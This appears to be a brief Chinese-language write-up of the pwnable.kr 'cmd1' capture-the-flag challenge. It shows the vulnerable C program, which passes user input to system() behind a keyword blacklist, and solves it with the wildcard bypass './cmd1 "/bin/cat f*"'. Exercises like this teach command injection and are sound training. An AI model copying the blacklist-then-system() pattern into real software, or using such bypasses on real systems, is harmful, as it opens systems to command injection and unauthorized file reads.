cmd1

Mommy! what is PATH environment in Linux?

ssh cmd1@pwnable.kr -p2222 (pw:guest)

源码如下：

#include 
#include <string.h>

int filter(char* cmd){
        int r=0;
        r += strstr(cmd, "flag")!=0;
        r += strstr(cmd, "sh")!=0;
        r += strstr(cmd, "tmp")!=0;
        return r;
}
int main(int argc, char* argv[], char** envp){
        putenv("PATH=/thankyouverymuch");
        if(filter(argv[1])) return 0;
        system( argv[1] );
        return 0;
}

对于传入进行了过滤，不能出现flag、sh、tmp

因此利用通配符，运行./cmd1 "/bin/cat f*"即可

pwn pwnable.kr

cmd1

相关

2021-安洵杯-pwn ezstack

Cyber Apocalypse 2021 pwn write up

通过一道简单的例题了解Linux内核PWN

Buuctf 刷题笔记(PWN)(1)

【pwn】学pwn日记（堆结构学习）

pwn中str()与p64()

V&NCTF2022 --PWN(逐步更新,）

pwnable.kr WP合集

pwndbg 基本操作指令

day-10 xctf-cgpwn2

PWN 笔记

[BUUCTF] pwnable_babystack

标签